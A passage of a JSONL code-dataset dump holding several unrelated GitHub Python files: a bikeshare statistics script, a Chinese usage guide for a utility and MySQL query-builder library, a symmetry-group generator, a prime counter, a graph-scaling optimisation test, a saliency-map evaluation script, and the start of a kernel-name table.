break\n else:\n print('Please, Enter a valid day!')\n\n print('-'*40)\n return city, month, day\n\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n \"\"\"\n # reading the data from files csv\n df = pd.read_csv(CITY_DATA[city])\n\n # convert the column to date time for extracting months and days easily\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n\n # make new columns for extracting specific data\n df['month'] = df['Start Time'].dt.month\n df['day'] = df['Start Time'].dt.day_name()\n df['hour'] = df['Start Time'].dt.hour\n\n # make condition for matching month\n if month != 'all':\n months = months = ['january', 'february', 'march', 'april', 'may', 'june']\n month = months.index(month) + 1 # to make it appear in Number\n df = df[df['month'] == month]\n \n # filter by day to create a new df, using the title for making the first letter is capital\n if day != 'all':\n df = df[df['day'] == day.title()]\n\n return df\n\n\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n\n # display the most common month\n print(f'The most common Month is: {df.month.mode()[0]}')\n\n # display the most common day of week\n print(f'The most common Day is: {df.day.mode()[0]}')\n\n # display the most common start hour\n print(f'The most common Hour is: {df.hour.mode()[0]}')\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n\n # display most commonly used start station\n print('The most common start station is: {}'.format(df['Start Station'].mode()[0]))\n\n # display most commonly used end station\n print('The most common end station is: {}'.format(df['End Station'].mode()[0]))\n\n # Two ways for display most frequent combination of start station and end station trip \n df['st&en combination'] = df['Start Station']+ ',' + df['End Station']\n print('The most common combination is: {}'.format(df['st&en combination'].mode()[0]))\n\n print('-'*20)\n\n comm_station = df.groupby(['Start Station','End Station']).size().sort_values(ascending=False)\n print(comm_station.head(1).to_frame())\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n\n # display total travel time\n print('Total Travel Time is: ', df['Trip Duration'].sum().round())\n\n # display mean travel time\n print('Average Travel Time is: ', df['Trip Duration'].mean().round())\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef user_stats(df, city):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n\n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n\n # Display counts of user types\n print('Counts of User: ', df['User Type'].value_counts().to_frame())\n\n # Display counts of gender\n if city != 'washington':\n print(f'\\nCounts of Gender: {df.Gender.value_counts().to_frame()}\\n')\n \n # Display earliest, most recent, and most common year of birth\n print(f\"The Earliest Year of Birth is: {int(df['Birth Year'].min())}\")\n print(f\"The Most Recent Year of Birth is: {int(df['Birth Year'].max())}\")\n print(f\"The Common Year of Birth is: {int(df['Birth Year'].mode()[0])}\")\n else:\n print('No (gender or birth year) for This City, Enter the Correct City.')\n \n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef main():\n while True:\n city, month, day = get_filters()\n df = load_data(city, month, day)\n \n time_stats(df)\n station_stats(df)\n \n trip_duration_stats(df)\n user_stats(df, city)\n\n restart = input('\\nWould you like to restart? Enter yes or no.\\n')\n if restart.lower() != 'yes':\n print('Thanks!')\n break\n\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"EsamElhosiny/Bike-ShareProject","sub_path":"Bikeshare_Script.py","file_name":"Bikeshare_Script.py","file_ext":"py","file_size_in_byte":5784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"13038833792","text":"\"\"\"一、安装(python 版本建议 3.7 以上)\n pip install --upgrade prestool (pip 版本22.0.3以上才可安装成功)\n\"\"\"\n\n'''二、常用工具'''\n\nfrom prestool.Tool import Tool\n\n\ntool = Tool()\n\n'''随机数据'''\ntool.random_name() # 随机姓名\ntool.random_phone() # 随机手机号\ntool.random_ssn() # 随机身份证\n\ntool.random_string(16) # 随机位数的字符串\ntool.random_number(8) # 随机位数的数字\n\ntool.random_ua() # 随机UA\ntool.random_ua('chrome') # 随机UA-Chrome\ntool.random_ua('firefox') # 随机UA-Firefox\ntool.random_ua('ie') # 随机UA-IE\ntool.random_ua('opera') # 随机UA-opera\ntool.random_ua('safari') # 随机UA-safari\n\n'''编码解码'''\ntool.url_encode('编码前的url地址') # 编码\ntool.url_decode('解码前的url地址') # 解码\n\ntool.base_64_encode('编码前的字符串') # base64编码\n\n\n'''加密相关'''\ntool.to_md5('原始字符串')\ntool.to_hmac_256('原始字符串', '加密key')\ntool.to_sha_256('原始字符串')\n\n'''发送消息'''\n'钉钉'\ntool.ding_talk_token = '钉钉机器人token'\ntool.ding_talk_sign_key = '钉钉机器人签名key'\n\ntool.send_ding_talk_msg('消息内容')\n'企业微信'\ntool.qy_wechat_token = '企业微信机器人token'\n\ntool.send_qy_wechat_msg('消息内容')\n'邮件'\ntool.mail_from_user_host = '发件地址host'\ntool.mail_from_user = '发件人邮箱号'\ntool.mail_from_user_pwd = '发件人pwd'\n\ntool.send_mail_msg(to_user='收件人邮箱地址(列表)', title='邮件标题', content='邮件内容')\n\n'''时间相关'''\ntool.time_stamp() # 秒级时间戳10位\ntool.time_stamp('ms') # 毫秒级时间戳13位\n\ntool.get_now_time() # 获取当前时间 20201206000000\ntool.get_now_time('-') # 获取当前时间 2020-12-06 00:00:00\n\ntool.date_to_time_stamp('2012-01-01 00:00:00') # 时间字符串转为时间戳\ntool.time_stamp_to_date(1732312234) # 时间戳转为时间字符串\n\n'格式转换'\ntool.json_dumps({\"test\": \"python字典\"}) # 字典转json\ntool.json_loads('{\"test\": \"python字典\"}') # json转字典\ntool.xml_to_dict('字符串') # xml转成python字典\ntool.dict_to_xml({\"test\": \"python字典\"}) # python字典 转成xml\n\n'http 请求'\ntool.http_client(url='', data={}, method='GET') # get请求\ntool.http_client(url='', data={}, method='POST') # post请求\n\ntool.get_cookies(url='接口地址', data={}, method='GET')\ntool.get_cookies(url='接口地址', data={}, method='POST')\n\ntool.trans_data_to_url(url='接口地址', data={}) # 把参数拼接到url上\n\n'dubbo 接口'\ntool.dubbo_args('参数1', '参数2', '参数3') # dubbo接口参数\ntool.invoke_dubbo('地址', '端口', '服务API名', '接口方法名', 'dubbo接口参数') # 请求dubbo接口\n\n'其他'\ntool.logger('日志信息')\ntool.get_ip_by_url('url地址') # 获取ip\n\n\"\"\"三、数据库语句(MySQL)\"\"\"\n'1) 生成数据库 sql 语句'\nfrom prestool.PresMySql import SqlStr\n\nsql = SqlStr()\n\n'''查询语句'''\n'''target 不传时,为全部字段,即 *,where={'key':'value'}'''\nsql.select_sql_str(table='table1', where={'id': 1, 'name': '张三'})\n\n'''select * from table1 where id = 1 and name = '张三';'''\n'''target=[i1,i2,i3] 时,为相应字段'''\nsql.select_sql_str(table='table1', target=['a', 'b', 'c'], where={'id': 1, 'name': '张三'})\n\n'''select a, b, c from table1 where 1=1 and id=1 and name='张三';'''\n'''limit=10 limit='10,1000' 为筛选限制字段'''\nsql.select_sql_str(table='table1', target=['a', 'b', 'c'], order={'age': 'desc', 'score': 'desc'}, limit=20)\n\n'''select a, b, c from table1 where 1=1 order by age desc, score desc limit 20;'''\n'''where 条件中有的字段为 null 或者 not null 时'''\nsql.select_sql_str(table='table1', target=['a', 'b', 'c'], where={'id': 1, 'name': 'null', 'age': not None})\n\n'''select a, b, c from table1 where 1=1 and id=1 and name is null and age is not null;'''\n'''支持排序语句'''\nsql.select_sql_str(table='table1', target=['a', 'b', 'c'], order={'age': 'desc', 'score': 'desc'})\n\n'''select a, b, c from table1 order by age desc, score desc;'''\n'''支持查询 in 语句'''\nsql.select_sql_str(table='table1', target=['a', 'b', 'c'], select_in={'orders': [123121312, 123123445, 213123]})\n\n'''select a, b, c from table1 where 1=1 and orders in (123121312, 123123445, 213123);'''\n'''支持 like 语句'''\nsql.select_sql_str(table='table1', target=['a', 'b', 'c'], like={'name': '%光', 'address': \"中国%\"})\n\n'''select a, b, c from table1 where 1=1 and name like '%光' and address like '中国%';'''\n'''支持 between 语句'''\nsql.select_sql_str(table='table1', target=['a', 'b', 'c'], between={'age': (10, 20), 'year': (2021, 2022)})\n\n'''select a, b, c from table1 where 1=1 and age between 10 and 20 and year between 2021 and 2022;'''\n'''支持大于、小于语句'''\nsql.select_sql_str(table='table1', target=['a', 'b', 'c'],\n compare={'age': {'>': 10, '<': 20}, 'year': {'>=': '2021'}})\n\n'''select a, b, c from table1 where 1=1 and age > 10 and age < 20 and year >= 2021;'''\n\n\n'''更新语句'''\n'''target 为要更新的数据,为字典结构 (支持大于、小于语句、between 语句、like 语句、in 语句)'''\nsql.update_sql_str(table='table1', target={'name': '李四', 'age': 15}, where={'id': 1, 'name': '张三'})\n'''update table1\nset name='李四',\n age=15\nwhere id = 1\n and name = '张三';\n\n删除数据\n支持大于、小于语句、between 语句、like 语句、in 语句\nsql.delete_sql_str(table='table1', where={'id': 1, 'name': '张三'})\ndelete\nfrom table1\nwhere id = 1\n and name = '张三';\n\n插入数据\nsql.insert_sql_str(table='table1', target={'id': 1, 'name': '张三'})\ninsert into table1 (id, name)\nvalues (1, '张三');'''\n\n\n\"\"\"2) 执行数据库语句\"\"\"\n\nfrom prestool.PresMySql import PresMySql\n\npres = PresMySql()\n'''初始化数据库信息'''\npres.mysql_host = ''\npres.mysql_port = 3306\npres.mysql_user = ''\npres.mysql_pwd = ''\npres.mysql_db_name = ''\npres.mysql_charset = 'utf8mb4'\n\n'''执行相应语句即可,执行的方法参数等同于第三节所述的 sql 语句,如'''\npres.to_query(table='table1', target=['a', 'b', 'c'], between={'age': (10, 20), 'year': (2021, 2022)})\n\npres.to_insert(table='table1', target={'id': 1, 'name': '张三'})\n\npres.to_delete(table='table1', where={'id': 1, 'name': '张三'})\n\npres.to_update(table='table1', target={'name': '李四', 'age': 15}, where={'id': 1, 'name': '张三'})\n","repo_name":"zhangsihua/python_script","sub_path":"python-常用工具库的使用.py","file_name":"python-常用工具库的使用.py","file_ext":"py","file_size_in_byte":6435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"70172511408","text":"from Matrix import *\nfrom IQ_Polynomials import *\nfrom Root_Of_Unity import RootOfUnity\nfrom Permutation import Permutation\nfrom fractions import Fraction\nfrom itertools import product\nimport numpy as np\nfrom typing import List\nfrom Progress_Bar import printProgressBar\n\nMAX_ELEMENT_ORDER = 1000\n\nclass SymGroup:\n def __init__(self, polynomial:IQPoly, permutations:List[Permutation]=[]):\n #verify the parameters are correct types\n if (\n not isinstance(polynomial, IQPoly) or\n not isinstance(permutations, List) or\n not all(isinstance(perm, Permutation) for perm in permutations)\n ): raise TypeError('Initialize with a IQPoly and a list of Permutation.')\n\n # verify that the size of the exponent matrix is the same for all of the permutations\n if not all(perm.matrix.array.shape == polynomial.exponent_matrix.array.shape for perm in permutations):\n raise ValueError('Permutations used for generating the group must be the same size as the column generators from the inverse exponent matrix')\n\n # the maximal symmetry group is generated by the columns of the inverse exponent matrix\n inv_exp_matrix = polynomial.inverse_exponent_matrix\n inv_exp_columns = inv_exp_matrix.transpose().array\n\n # turn each column into a diagonal matrix\n generators = np.concatenate((\n [perm.matrix for perm in permutations],\n [Matrix.diagonal(col) for col in inv_exp_columns]\n ))\n\n # groupElements, groupElementGeneratorPowers = generateGroup(generators)\n\n groupElements = []\n groupElementGeneratorPowers = []\n\n diagonalGenerators = np.array([Matrix.diagonal(col) for col in inv_exp_columns])\n diagonalGroupElements = generateGroupBetter(\n diagonalGenerators,\n groupOrder=polynomial.exponent_matrix.intDeterminant(),\n showProgress=True,\n progressMsg='Generating the diagonal subgroup'\n )\n\n permutationGenerators = np.array([perm.matrix for perm in permutations])\n permuationGroupElements = generateGroupBetter(\n permutationGenerators,\n showProgress=True,\n progressMsg='Generating the permutation subgroup'\n )\n\n if len(permuationGroupElements) == 0:\n # no permutation elements so we're done\n groupElements = diagonalGroupElements\n\n self.order = len(groupElements)\n self.generators = generators\n self.elements = np.array(groupElements)\n self.conjugacyClasses = generateConjugacyClasses(groupElements)\n\n else:\n # the cartesian product of the diagonal group and the permutation group (while removing duplicates)\n # should be our whole group\n print('Generating the maximal group')\n totalIters = len(diagonalGroupElements) * len(permuationGroupElements)\n printProgressBar(0, totalIters, prefix = 'Progress:', suffix = f'Complete ({0}/{totalIters})', length = 50)\n for dIndex, diag in enumerate(diagonalGroupElements):\n for pIndex, perm in enumerate(permuationGroupElements):\n elementMatrix = perm * diag\n if elementMatrix not in groupElements:\n groupElements.append(elementMatrix)\n currentIter = (dIndex * len(permuationGroupElements)) + pIndex + 1\n printProgressBar(currentIter, totalIters, prefix = 'Progress:', suffix = f'Complete ({currentIter}/{totalIters})', length = 50)\n\n\n self.order = len(groupElements)\n self.generators = generators\n self.elements = np.array(groupElements)\n self.conjugacyClasses = generateConjugacyClasses(groupElements)\n\n def __repr__(self):\n return (\n f'Symmetry Group of order {self.order}\\n'\n )\n\n def __str__(self):\n gens = '\\n'.join(f'{str(gen)}\\n' for gen in self.generators)\n elems = '\\n'.join(f'{elem} {pows}\\n' for elem, pows in zip(self.elements, self.element_generator_representation))\n return (\n f'Symmetry Group of order {self.order}\\n'\n '\\n~~~~~~~~~Generators~~~~~~~~~\\n'\n f'{gens}'\n '\\n~~~~~~~~~~Elements~~~~~~~~~~\\n'\n f'{elems}'\n )\n\n\n\n\n\ndef getOrderOfElement(element:Matrix):\n a = np.empty(len(element.array), dtype=object)\n a.fill(RootOfUnity(Fraction()))\n identity_matrix = Matrix.diagonal(a)\n\n\n order = 1\n power = element.copy()\n while power != identity_matrix:\n power = power * element\n order += 1\n\n if order > MAX_ELEMENT_ORDER:\n raise ValueError('Cannot calcuate the order of the element. Order exceeded MAX_ELEMENT_ORDER.')\n \n return order\n\ndef generateGroup(generators, groupOrder = None, showProgress = False, progressMsg = None):\n\n if len(generators) == 0:\n return [], []\n\n # get the order of each generator\n generatorOrders = [getOrderOfElement(elem) for elem in generators]\n\n #create the list of cartesian products for the powers possible for the generating the group\n #this outputs a list of integers that are used as powers on the generators\n iterableList = []\n for elementOrder in generatorOrders:\n iterableSet = [*range(1, elementOrder + 1)]\n iterableList.append(iterableSet)\n cartesianProduct = list(product(*iterableList))\n\n #use the cartesian product elements to calculate the group elements\n #save both the actual matrix and the generator products representation\n groupElements = []\n groupElementGeneratorPowers = []\n totalIters = groupOrder if groupOrder != None else len(cartesianProduct)\n if showProgress:\n if progressMsg != None:\n print(progressMsg)\n printProgressBar(0, totalIters, prefix = 'Progress:', suffix = f'Complete ({0}/{totalIters})', length = 50)\n for cIndex, elementPowers in enumerate(cartesianProduct):\n # if we have all of the elements already, break\n if (groupOrder != None and len(groupElements) == groupOrder):\n break\n\n # set up the identity matrix with roots of unity\n a = np.empty(len(generators[0].array), dtype=object)\n a.fill(RootOfUnity(Fraction()))\n identity_matrix = Matrix.diagonal(a)\n\n # run through the generators and build the element\n elementMatrix = identity_matrix\n generatorRepr = []\n for pIndex, power in enumerate(elementPowers):\n elementMatrix *= generators[pIndex]**power\n generatorRepr.append(power)\n if elementMatrix not in groupElements:\n groupElements.append(elementMatrix)\n groupElementGeneratorPowers.append(generatorRepr)\n\n if showProgress:\n if groupOrder != None:\n printProgressBar(len(groupElements), totalIters, prefix = 'Progress:', suffix = f'Complete ({len(groupElements)}/{totalIters})', length = 50)\n else:\n printProgressBar(cIndex + 1, totalIters, prefix = 'Progress:', suffix = f'Complete ({cIndex + 1}/{totalIters})', length = 50)\n\n return groupElements, groupElementGeneratorPowers\n \ndef generateGroupBetter(generators, groupOrder = None, showProgress = False, progressMsg = None):\n if len(generators) == 0:\n return []\n \n groupElements = []\n totalIters = len(generators)\n if showProgress:\n if progressMsg != None:\n print(progressMsg)\n printProgressBar(0, totalIters, prefix = 'Progress:', suffix = f'Complete ({0}/{totalIters})', length = 50)\n for index, generator in enumerate(generators):\n powers = getAllElementPowers(generator)\n newElements = getAllProducts(groupElements, powers)\n groupElements += newElements\n if (len(groupElements) == groupOrder):\n return groupElements\n\n if showProgress: \n printProgressBar(index + 1, totalIters, prefix = 'Progress:', suffix = f'Complete ({index + 1}/{totalIters})', length = 50)\n\n return groupElements\n\ndef generateConjugacyClasses(elements):\n tmpElements = elements.copy()\n conjugacyClasses = []\n iterationNum = 0\n totalIterations = len(elements)\n \n print('Generating the conjugacy classes')\n printProgressBar(0, totalIterations, prefix = 'Progress:', suffix = f'Complete ({0}/{totalIterations})', length = 50)\n while (len(tmpElements) > 0):\n currentElement = tmpElements[0]\n currentConjugacyClass = []\n for element in elements:\n conjugate = element * currentElement * element.verySlow_rootOfUnityInverse()\n if conjugate not in currentConjugacyClass:\n currentConjugacyClass.append(conjugate)\n tmpElements.remove(conjugate)\n iterationNum += 1\n printProgressBar(iterationNum, totalIterations, prefix = 'Progress:', suffix = f'Complete ({iterationNum}/{totalIterations})', length = 50)\n conjugacyClasses.append(currentConjugacyClass)\n \n return conjugacyClasses\n\n\n\n\ndef getAllElementPowers(element):\n order = getOrderOfElement(element)\n\n generatedElements = [element]\n for power in range(2, order + 1):\n generatedElements.append(generatedElements[-1] * element)\n \n return generatedElements\n \ndef getAllProducts(setA, setB):\n if len(setA) == 0:\n return setB\n if len(setB) == 0:\n return setA\n\n totalIters = len(setA) * len(setB)\n\n groupElements = []\n # printProgressBar(0, totalIters, prefix = 'Progress:', suffix = f'Complete (0/{totalIters})', length = 50)\n for indexA, elementA in enumerate(setA):\n for indexB, elementB in enumerate(setB):\n element = elementA * elementB\n if element not in groupElements:\n groupElements.append(element)\n currentIter = (indexA * len(setB)) + indexB + 1\n # printProgressBar(currentIter, totalIters, prefix = 'Progress:', suffix = f'Complete ({currentIter}/{totalIters})', length = 50)\n \n return groupElements","repo_name":"dunkmway/State-Space-V.2","sub_path":"Symmetry_Groups.py","file_name":"Symmetry_Groups.py","file_ext":"py","file_size_in_byte":10107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"24597866092","text":"import math\nimport multiprocessing as multi\nfrom timeit import default_timer as timer\n\ndef isPrime(num):\n if num <= 1: return False\n if num == 2: return True\n if num % 2 == 0: return False\n\n boundary = math.floor(math.sqrt(num))\n\n for x in range(3, boundary + 1, 2):\n if num % x == 0:\n return False\n return True\n\ndef findPrimesParallel(numMax):\n full_list = dict()\n\n for x in range(0, numMax):\n if isPrime(x):\n full_list[x] = True\n return full_list\n\nstart = timer()\nnumMax = 1000000\n\nresult = findPrimesParallel(numMax)\ntt = timer() - start\nprint(\"Number of primes: %d\" %len(result))\nprint(\"Process time: %f s\" %tt)","repo_name":"NagyDominik/pythonCUDA","sub_path":"prime_sc.py","file_name":"prime_sc.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"12085895992","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\n\nimport networkx as nx\nimport numpy as np\nfrom digraphx.tiny_digraph import DiGraphAdapter\nfrom ellalgo.cutting_plane import cutting_plane_optim\nfrom ellalgo.ell import Ell\n\nfrom netoptim.optscaling_oracle import OptScalingOracle\n\n\ndef vdc(n, base=2):\n \"\"\"[summary]\n\n Arguments:\n n ([type]): [description]\n\n Keyword Arguments:\n base (int): [description] (default: {2})\n\n Returns:\n [type]: [description]\n \"\"\"\n vdc, denom = 0.0, 1.0\n while n:\n denom *= base\n n, remainder = divmod(n, base)\n vdc += remainder / denom\n return vdc\n\n\ndef vdcorput(n, base=2):\n \"\"\"[summary]\n\n Arguments:\n n ([type]): [description]\n\n Keyword Arguments:\n base (int): [description] (default: {2})\n\n Returns:\n [type]: [description]\n \"\"\"\n return [vdc(i, base) for i in range(n)]\n\n\ndef form_graph(T, pos, eta, seed=None):\n \"\"\"Form N by N grid of nodes, connect nodes within eta.\n mu and eta are relative to 1/(N-1)\n\n Arguments:\n t (float): [description]\n pos ([type]): [description]\n eta ([type]): [description]\n\n Keyword Arguments:\n seed ([type]): [description] (default: {None})\n\n Returns:\n [type]: [description]\n \"\"\"\n if seed:\n np.random.seed(seed)\n\n N = np.sqrt(T)\n eta = eta / (N - 1)\n\n # generate perterbed grid positions for the nodes\n pos = dict(enumerate(pos))\n n = len(pos)\n\n # connect nodes with edges\n gra = nx.random_geometric_graph(n, eta, pos=pos)\n gra = nx.DiGraph(gra)\n gra = DiGraphAdapter(gra)\n # gra.add_node('dummy', pos = (0.3, 0.4))\n # gra.add_edge('dummy', 1)\n # gra.nodemap = {vtx : i_v for i_v, vtx in enumerate(gra.nodes())}\n return gra\n\n\nN = 75\nM = 20\nT = N + M\nxbase = 2\nybase = 3\nx = [i for i in vdcorput(T, xbase)]\ny = [i for i in vdcorput(T, ybase)]\npos = zip(x, y)\ngra = form_graph(T, pos, 1.6, seed=5)\n# for utx, vtx in gra.edges():\n# h = np.array(gra.nodes()[utx]['pos']) - np.array(gra.nodes()[vtx]['pos'])\n# gra[utx][vtx]['cost'] = np.sqrt(h @ h)\n\nfor utx, vtx in gra.edges():\n h = np.array(gra.nodes()[utx][\"pos\"]) - np.array(gra.nodes()[vtx][\"pos\"])\n distance = np.log(np.sqrt(h.dot(h)))\n gra[utx][vtx][\"cost\"] = (distance, distance)\n\ncmax = max(cost[0] for _, _, cost in gra.edges.data(\"cost\"))\ncmin = min(cost[0] for _, _, cost in gra.edges.data(\"cost\"))\n\n\ndef get_cost(edge):\n return edge[\"cost\"]\n\n\ndef test_optscaling():\n \"\"\"[summary]\n\n Keyword Arguments:\n duration (float): [description] (default: {0.000001})\n\n Returns:\n [type]: [description]\n \"\"\"\n xinit = np.array([cmax, cmin])\n t = cmax - cmin\n ellip = Ell(1.5 * t, xinit)\n dist = list(0 for _ in gra)\n omega = OptScalingOracle(gra, dist, get_cost)\n xbest, _, _ = cutting_plane_optim(omega, ellip, float(\"inf\"))\n # fmt = '{:f} {} {} {}'\n # print(np.exp(xbest))\n # print(fmt.format(np.exp(fb), niter, feasible, status))\n assert xbest is not None\n # return ell_info.num_iters\n","repo_name":"luk036/netoptim","sub_path":"tests/test_optscaling.py","file_name":"test_optscaling.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"12339807704","text":"import sys\r\nimport importlib\r\nfrom data import Test_Dataset\r\nimport torch\r\nimport time\r\nfrom progress.bar import Bar\r\nimport os\r\nfrom collections import OrderedDict\r\nimport cv2\r\nfrom PIL import Image\r\nfrom util import *\r\nimport numpy as np\r\nimport argparse\r\n\r\nfrom data import *\r\nfrom metric import *\r\n\r\n# python3 eval.py --data_path=../dataset/ --pre_path=maps/rgbt/ADF --mode=te\r\n# python3 eval.py --data_path=../dataset/ --pre_path=maps/vsod/LSD --mode=oe\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--data_path', default='../../dataset/', help='The name of network')\r\n parser.add_argument('--vals', default='all', help='Set the testing sets')\r\n \r\n parser.add_argument('--pre_path', default='./maps', help='Weight path of network')\r\n parser.add_argument('--mode', default='ce', help='Weight path of network')\r\n \r\n params = parser.parse_args()\r\n config = vars(params)\r\n config['orig_size'] = True\r\n config['size'] = 320\r\n config['mode'] = config['mode'].split(',')\r\n config['stage'] = 1\r\n config['trset'] = 'tr'\r\n \r\n if config['vals'] == 'all':\r\n vals = ['SED2', 'PASCAL-S', 'ECSSD', 'HKU-IS', 'DUTS-TE', 'DUT-OMRON']\r\n else:\r\n vals = config['vals'].split(',')\r\n \r\n #print(config['mode'])\r\n test_sets = get_test_list(modes=config['mode'], config=config)\r\n \r\n #print(test_sets.items())\r\n for set_name, test_set in test_sets.items():\r\n #img_path = '{}/{}/'.format(config['pre_path'], val)\r\n set_sub = set_name.split('_')[-1]\r\n #print(set_sub)\r\n img_path = '{}/{}/'.format(config['pre_path'], set_sub)\r\n #img_path = config['pre_path']\r\n if not os.path.exists(img_path):\r\n print('{} not exists!!!!!'.format(img_path))\r\n continue\r\n #test_set = Test_Dataset(name=val, config=config)\r\n titer = test_set.size\r\n MR = MetricRecorder(titer)\r\n #MR = MetricRecorder()\r\n \r\n #print(titer)\r\n test_bar = Bar('Dataset {:10}:'.format(set_name), max=titer)\r\n pre_name = ''\r\n kk = 0\r\n for j in range(titer):\r\n sample_dict = test_set.load_data(j)\r\n gt = sample_dict['gt']\r\n name = sample_dict['name']\r\n #_, gt, name = test_set.load_data(j)\r\n name = name.split('.')[0]\r\n \r\n a,b = name.split('/')\r\n \r\n #if pre_name == a:\r\n # kk += 1\r\n #else:\r\n # kk = 0\r\n #name = '{}/{}'.format(a, kk)\r\n #name = '{}/{}_{}'.format(a, a, b)\r\n \r\n pred = Image.open(img_path + name + '.png').convert('L')\r\n #print(np.max(pred))\r\n out_shape = gt.shape\r\n \r\n #MR.update(pre=pred, gt=gt)\r\n pred = np.array(pred.resize((out_shape[::-1])))\r\n \r\n pred, gt = normalize_pil(pred, gt)\r\n MR.update(pre=pred, gt=gt)\r\n #print(np.max(pred), np.max(gt))\r\n #MR.update(pre=pred.astype(np.uint8), gt=(gt * 255).astype(np.uint8))\r\n \r\n \r\n Bar.suffix = '{}/{}'.format(j, titer)\r\n test_bar.next()\r\n \r\n #scores = MR.show(bit_num=3)\r\n mae, (maxf, meanf, *_), sm, em, wfm = MR.show(bit_num=3)\r\n print(' Max-F: {}, Maen-F: {}, Fbw: {}, MAE: {}, SM: {}, EM: {}.'.format(maxf, meanf, wfm, mae, sm, em))\r\n #print(' Max-F: {}, adp-F: {}, Fbw: {}, MAE: {}, SM: {}, EM: {}.'.format(scores['fm'], scores['adpFm'], scores['wFm'], scores['MAE'], scores['Sm'], scores['adpEm']))\r\n #mae, (maxf, meanf, *_), sm, em, wfm = MR.show(bit_num=3)\r\n #print(' MAE: {}, Max-F: {}, Maen-F: {}, SM: {}, EM: {}, Fbw: {}.'.format(mae, maxf, meanf, sm, em, wfm))\r\n\r\n \r\nif __name__ == \"__main__\":\r\n main()","repo_name":"moothes/A2S-v2","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":3860,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"2"}
+{"seq_id":"13678553451","text":"# -*- coding: utf-8 -*-\n\n# Author: Niels A.D.\n# Project: HGB (https://github.com/nielsAD/hgb)\n# License: Mozilla Public License, v2.0\n\nimport sys\nimport os\nimport re\nimport math\nimport subprocess\nimport itertools\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\nkernels = {\n 'kern_rank_omp_def_row': '',\n 'kern_rank_omp_stp_row': 'OMP1',\n 'kern_rank_omp_bin_row': 'OMP3',\n 'kern_rank_cpu_lib_row': 'MKL',\n 'kern_rank_cud_def_row': '',\n 'kern_rank_cud_stp_row': 'CUD1',\n 'kern_rank_cud_wrp_row': 'CUD2',\n 'kern_rank_cud_dyn_row': 'CUD3',\n 'kern_rank_cud_lib_row': 'CSP',\n 'kern_rank_ocl_def_row': '',\n 'kern_rank_ocl_stp_row': 'OCL1',\n 'kern_rank_ocl_wrp_row': 'OCL2',\n 'kern_rank_omp_def_col': '',\n 'kern_rank_omp_stp_col': 'OMP1',\n 'kern_rank_omp_bin_col': 'OMP3',\n 'kern_rank_cpu_lib_col': 'MKL',\n 'kern_rank_cud_def_col': '',\n 'kern_rank_cud_stp_col': 'CUD1',\n 'kern_rank_cud_wrp_col': 'CUD2',\n 'kern_rank_cud_dyn_col': 'CUD3',\n 'kern_rank_cud_lib_col': 'CSP',\n 'kern_rank_ocl_def_col': '',\n 'kern_rank_ocl_stp_col': 'OCL1',\n 'kern_rank_ocl_wrp_col': 'OCL2',\n\n 'csr_omp_bin': 'OMP3',\n 'csr_mkl_lib': 'MKL',\n 'csr_cud_lib': 'CSP',\n\n 'bcsr_ref_def': '',\n 'bcsr_ref_stp': '',\n 'bcsr_ref_map': '',\n 'bcsr_omp_stp': 'OMP1',\n 'bcsr_omp_map': 'OMP1',\n 'bcsr_omp_rdx': 'OMP2',\n 'bcsr_mpi_stp': 'MPI1',\n 'bcsr_mpi_map': 'MPI1',\n 'bcsr_mpi_rdx': 'MPI2',\n 'pcsr_mpi_map': 'MPI3',\n 'pcsr_mpi_stp': 'MPI3',\n 'bcsr_spu_stp': 'SPU1',\n 'bcsr_spu_map': 'SPU1',\n 'bcsr_spu_rdx': 'SPU2',\n 'bcsr_spu2_stp': 'SPU1_2',\n 'bcsr_spu2_map': 'SPU1_2',\n 'bcsr_spu2_rdx': 'SPU2_2',\n 'bcsr_ocl_mix': '',\n 'bcsr_ocl_stp': 'OCL1',\n 'bcsr_ocl_map': 'OCL1',\n 'bcsr_ocl_wrp': 'OCL2',\n 'bcsr_cud_mix': '',\n 'bcsr_cud_stp': 'CUD1',\n 'bcsr_cud_map': 'CUD1',\n 'bcsr_cud_wrp': 'CUD2',\n 'bcsr_cud_dyn': 'CUD3',\n\n 'csc_omp_bin': 'OMP3',\n 'csc_mkl_lib': 'MKL',\n 'csc_cud_lib': 'CSP',\n\n 'bcsc_ref_def': '',\n 'bcsc_ref_stp': '',\n 'bcsc_ref_map': '',\n 'bcsc_omp_stp': 'OMP1',\n 'bcsc_omp_map': 'OMP1',\n 'bcsc_omp_rdx': 'OMP2',\n 'bcsc_mpi_stp': 'MPI1',\n 'bcsc_mpi_map': 'MPI1',\n 